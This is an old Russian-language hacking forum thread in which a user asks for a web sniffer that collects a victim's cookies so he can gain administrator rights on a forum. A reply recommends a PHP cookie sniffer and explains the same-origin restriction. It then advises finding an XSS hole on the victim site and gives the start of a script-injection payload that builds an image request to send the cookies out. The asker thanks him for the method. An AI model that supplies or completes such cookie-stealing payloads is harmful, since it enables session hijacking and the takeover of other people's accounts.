Не могу найти веб снифер, на который передадуться куки жертвы, которые впоследствии можно использовать для получение прав админа на форуме! Кто нибудь подскажет?
05.10.2006 18:31:55
Не могу найти веб снифер, на который передадуться куки жертвы, которые впоследствии можно использовать для получение прав админа на форуме! Кто нибудь подскажет?
|
|
|
|
05.10.2006 20:02:41
|
|
|
|
05.10.2006 20:08:29
Так же в сети выложен сорец подобного - PHP sniffer. Передача параметров снифферу осуществляется через CGI-строку, расположенную после знака ?. Например:
Но ты дожен помнить, что просто так куки с другого домена взять невозможно. Посредством пхп кукисы берутся из переменной $_COOKIE Вот что получается при попытке обратиться к кукам одного домена с другого посредством JS.
Права не позволяют. Поэтому отыщи XSS на сайте жертве и работай с конструкцией вида site/?search=<script language=javascript>document.write('<img src=" |
|||
|
|
05.10.2006 20:08:50
Ну этот снифер куки не передаёт, а только айпи и реферерр... Или я чё то не догоняю?
|
|
|
|
05.10.2006 22:07:24
|
|||||
|
|
05.10.2006 22:28:01
Слух спасибо тебе огромное! Судя повсему XSS надо юзать только на тех сайтах где есть куки и где нет от него защиты! ))) Я думал всё проще!
Клоуз топ |
||||
|
|
|||